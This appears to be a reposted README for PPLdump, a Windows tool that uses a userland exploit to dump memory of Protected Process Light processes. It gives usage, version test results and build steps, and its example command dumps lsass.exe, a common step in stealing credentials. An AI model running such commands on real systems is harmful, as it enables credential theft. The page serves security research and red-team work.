PPLdump implements a userland exploit that was initially discussed by James Forshaw (a.k.a. @tiraniddo) – in this blog post – for dumping the memory of any PPL as an administrator.
I wrote two blog posts about this tool. The first part is about Protected Processes concepts while the second one dicusses the bypass technique itself.
Usage
Simply run the executable without any argument and you will get a detailed help/usage.
c:\Temp>PPLdump64.exe
_
| _ | _ | | | | _ _
| | | || . | | | | . | version 0.4 || || |||__|||| | by @itm4n
|_|
Description:
Dump the memory of a Protected Process Light (PPL) with a userland exploit
Usage:
PPLdump.exe [-v] [-d] [-f]
Arguments:
PROC_NAME The name of a Process to dump
PROC_ID The ID of a Process to dump
DUMP_FILE The path of the output dump file
Options:
-v (Verbose) Enable verbose mode
-d (Debug) Enable debug mode (implies verbose)
-f (Force) Bypass DefineDosDevice error check
Examples:
PPLdump.exe lsass.exe lsass.dmp
PPLdump.exe -v 720 out.dmp
Tests
| Windows version | Build | Edition | Arch | Admin | SYSTEM |
|---|---|---|---|---|---|
| Windows 10 20H2 | 19042 | Pro | x64 | ✔️ | ✔️ |
| Windows 10 20H2 | 19042 | Pro | x86 | ✔️ | ✔️ |
| Windows 10 1909 | 18363 | Pro | x64 | ✔️ | ✔️ |
| Windows 10 1507 | 10240 | Educational | x64 | ✔️ | ✔️ |
| Windows 10 1507 | 10240 | Home | x64 | ✔️ | ✔️ |
| Windows 10 1507 | 10240 | Pro | x64 | ✔️ | ✔️ |
| Windows Server 2019 | 17763 | Standard | x64 | ✔️ | ✔️ |
| Windows Server 2019 | 17763 | Essentials | x64 | ✔️ | ✔️ |
| Windows 8.1 | 9600 | Pro | x64 | ⚠️ | ⚠️ |
| Windows Server 2012 R2 | 9600 | Standard | x64 | ⚠️ | ⚠️ |
The exploit fails on fully updated Windows 8.1 / Server 2012 R2 machines. I have yet to figure out which patch caused the error.
[-] DefineDosDevice failed with error code 6 – The handle is invalid.
On Windows 8.1 / Server 2012 R2, you might also have to compile the binary statically (see “Build instructions” below).
Build Instructions
This Visual Studio Solution comprises two projects (the executable and a payload DLL) that need to be compiled in a specific order. Everything is pre-configured, so you just have to follow these simple instructions. The compiled payload DLL is automatically embedded into the final executable.
Release / x64 or Release / x86 depending on the architecture of the target machine.Build > Build Solution.On Windows 8.1 / Server 2012 R2, you might have to compile the binary statically.
PPLdump project.Configuration Properties > C/C++ > Code Generation.Multi-threaded (/MT) as the Runtime Library option.A tool crafted with simplicity in mind but harboring its own set of flaws. Despite…
CyberSentry is a robust automated scanning tool designed for web applications. It helps security professionals, ethical…
Delve into the world of DARKARMY, a potent arsenal of cybersecurity tools designed to empower…
Evade (Evasion) - this feature helps you to evade spells of enemies directed at you…
Step into the world of bug hunting with Cazador, a powerful toolkit designed to equip…
Prepare to take your Among Us gaming experience to the next level with the latest…